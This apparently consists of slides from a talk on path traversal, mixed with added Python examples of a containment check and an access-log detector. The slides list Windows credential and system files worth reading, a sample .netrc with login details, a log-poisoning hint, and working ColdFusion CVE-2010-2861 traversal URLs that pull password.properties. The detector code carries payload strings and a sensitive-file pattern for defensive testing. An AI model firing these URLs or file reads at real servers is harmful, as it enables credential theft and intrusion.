4. Common understanding of path traversal
A Path Traversal attack aims to access files and directories that are stored outside
the web root folder.
(OWASP)
WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?
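The OWASP definition above is also the defence in one sentence: a file read driven by user input must not be able to leave the directory it is meant to serve from. The following is an added example (not part of the slides) of the containment check a web application should run before opening a user-named file. The base directory /srv/www/uploads is a constructed value; the check works on the path as the framework has already URL-decoded it, and rejects NUL bytes, backslashes, absolute paths, and anything whose resolved real path lands outside the base directory.

```python
import os


class PathTraversalError(ValueError):
    """Raised when a user-supplied path would escape the allowed base directory."""


def resolve_under_base(base_dir, user_path):
    """Return the absolute path of user_path inside base_dir, or raise.

    user_path is the value as the web framework already URL-decoded it;
    decoding it again here would be a bug (double-decoding).
    Checks, in order:
      1. NUL bytes, which truncate the path in C-based file APIs
      2. backslashes, which Windows treats as separators even when the
         application only expects forward slashes
      3. absolute paths
      4. the resolved real path (symlinks followed) must stay inside base_dir
    """
    if "\x00" in user_path:
        raise PathTraversalError("NUL byte in path")
    if "\\" in user_path:
        raise PathTraversalError("backslash in path")
    if os.path.isabs(user_path):
        raise PathTraversalError("absolute path not allowed")
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    # commonpath is the reliable containment test: a plain startswith()
    # would wrongly accept /srv/www/uploads-private when base is /srv/www/uploads
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathTraversalError("path escapes base directory")
    return candidate


def is_safe(base_dir, user_path):
    """True if user_path resolves inside base_dir, False otherwise."""
    try:
        resolve_under_base(base_dir, user_path)
    except PathTraversalError:
        return False
    return True


# Constructed base directory for the demo; it does not need to exist on disk.
UPLOAD_DIR = "/srv/www/uploads"

if __name__ == "__main__":
    for p in ["report.pdf", "2024/q1/report.pdf", "../../etc/passwd",
              "..\\..\\windows\\win.ini", "ok.txt\x00.jpg", "/etc/passwd",
              "../uploads-private/secret.txt"]:
        print(f"{p!r:40} -> {'allowed' if is_safe(UPLOAD_DIR, p) else 'rejected'}")
```

The last input in the demo list is the one a naive `startswith(base_dir)` check lets through: it resolves to a sibling directory whose name merely begins with the base path. Resolving with realpath first also means a symlink planted inside the upload directory cannot be used to walk out of it.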
9. .netrc file
• Stores saved credentials (a "remember me") for ftp
What I had when I checked /home/username/.netrc:
machine ftp.server.com
login secret_usr
password secret_pwd
10. Help for shell uploading
/proc/self/environ /proc/self/status
Useful if we want to find the access or error logs of Apache, the document root of the server, or, if we also have LFI, to exploit Apache log poisoning.
14. File                                           Expected Contents / Description
%SYSTEMDRIVE%\boot.ini                             A file that can be counted on to be on virtually every Windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini                                   This is another file to look for if boot.ini isn't there or isn't coming back, which is sometimes the case.
%SYSTEMROOT%\repair\SAM                            Stores users' passwords in a hashed format (LM hash and NTLM hash). The SAM file in repair is locked, but can be retrieved using forensic or Volume Shadow Copy methods.
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
%SYSTEMDRIVE%\autoexec.bat
15. (continued)
%SYSTEMDRIVE%\pagefile.sys                         Large file, but contains spill-over from RAM; usually lots of good information can be pulled, but it should be a last resort due to size.
%WINDIR%\system32\logfiles\httperr\httperr1.log    IIS 6 error log
%SystemDrive%\inetpub\logs\LogFiles                IIS 7's logs location
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log     (YYMMDD = year month day)
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
19. Also for ColdFusion (not the latest versions, but still):
ColdFusion 6:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en
ColdFusion 7:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en
ColdFusion 8:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
All versions:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en
http://www.cvedetails.com/cve/CVE-2010-2861/
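Every request shape on the slides above (plain `../`, URL-encoded and double-encoded sequences, backslash separators, the `%00` terminator, and the sensitive file names from the Windows table) leaves a trace in the web server's access log. The following is an added example (not from the slides or from any project) of a small detector that runs over combined-format log lines and reports which of those indicators each suspicious request carries. The log lines are constructed for the demo; the file-name list is taken from the slides and is an assumption about what is worth flagging in a given environment.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>\S+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# "../" or "..\" after decoding; a bare ".." inside a file name is not traversal.
DOTDOT_RE = re.compile(r'\.\.[\\/]')

# File names the slides list as read targets (assumed watch-list for this demo).
SENSITIVE_RE = re.compile(
    r'(boot\.ini|win\.ini|/etc/passwd|/etc/shadow|\.netrc|/proc/self/environ|'
    r'/proc/self/status|password\.properties|ntuser\.dat|pagefile\.sys)',
    re.IGNORECASE,
)


def fully_decode(raw, max_rounds=3):
    """Percent-decode until the string stops changing; return (decoded, rounds)."""
    current, rounds = raw, 0
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds


def classify_request(path):
    """Return the list of traversal indicators found in one request path."""
    decoded, rounds = fully_decode(path)
    # Treat backslash as a separator: Windows hosts do, and so do many parsers.
    normalised = decoded.replace("\\", "/")
    reasons = []
    if DOTDOT_RE.search(decoded):
        reasons.append("dot-dot traversal")
        if rounds >= 2:
            reasons.append("double-encoded")
        elif rounds == 1:
            reasons.append("url-encoded")
    if "\x00" in decoded:
        reasons.append("null byte")
    if SENSITIVE_RE.search(normalised):
        reasons.append("sensitive file reference")
    return reasons


def scan_log(lines):
    """Parse each combined-format line and report the suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than abort the whole scan
        reasons = classify_request(m.group("path"))
        if reasons:
            findings.append({"ip": m.group("ip"), "path": m.group("path"),
                             "status": int(m.group("status")), "reasons": reasons})
    return findings


# Constructed sample log; IPs are from the documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /download?file=..%2f..%2fwindows%2fwin.ini HTTP/1.1" 200 403 "-" "curl/8.0.1"',
    '198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%5c..%5c..%5clib%5cpassword.properties%00en HTTP/1.1" 200 211 "-" "curl/8.0.1"',
    '192.0.2.9 - - [10/Oct/2023:13:57:01 +0000] "GET /view?f=%252e%252e%252fproc%252fself%252fenviron HTTP/1.1" 500 0 "-" "python-requests/2.31"',
    '192.0.2.9 - - [10/Oct/2023:13:57:05 +0000] "GET /files/report..v2.pdf HTTP/1.1" 200 9031 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Oct/2023:13:57:09 +0000] "GET /static/app.css HTTP/1.1" 304 0 "-" "Mozilla/5.0"',
    'not a log line',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:14} {f['status']} {f['path']}\n    -> {', '.join(f['reasons'])}")
```

The status code is carried along on purpose: a flagged request that returned 200 with a non-trivial body is the one to triage first, since a 404 or 500 on the same path is a probe that most likely failed. The `report..v2.pdf` line is there to show that the dot-dot rule needs a following separator, which keeps ordinary file names out of the findings.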
20. • In case you still don't have a path traversal to post-exploit, maybe this tool could be useful for you: http://dotdotpwn.blogspot.ru/